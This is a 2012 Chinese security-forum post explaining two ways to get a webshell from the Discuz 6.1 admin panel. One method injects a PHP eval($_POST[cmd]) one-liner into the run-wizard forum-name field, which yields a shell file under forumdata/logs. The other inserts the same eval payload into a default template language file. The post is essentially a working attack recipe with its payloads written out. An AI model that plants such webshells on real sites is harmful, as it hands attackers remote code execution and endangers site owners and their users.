找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2240|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell
& P  c9 Y& E4 E3 [4 Q, t. U好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下& d( Y5 z* p! d  V
1:
0 c9 j  G, F9 P4 E" m  V7 G( ?http://127.0.0.1/discuz/admincp. ... zard&frames=yes" R+ k* m: M( n5 ~$ B
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
& M3 E* T5 t) F  R# s) b<?php eval($_POST[cmd]);?>
- V  E) {3 w: \5 p$ l后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php4 Z0 I; T; p# ^' p  t5 @4 @3 k# y

1 K$ m6 Q6 d6 R# \! ^
# c* e$ i# o# p. Q" `2:后台模板管理--默认模板套系--详情
: K7 |& k! g6 ?9 D: E- Qtemplates/default/actions.lang.php/ H$ e. ]2 l3 B3 v; Z2 S1 O, M; ?
jhackj\\');eval($_POST[cmd])?>;//
2 n9 t1 V5 _4 q( M+ F4 @, \1 `8 r4 s
利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表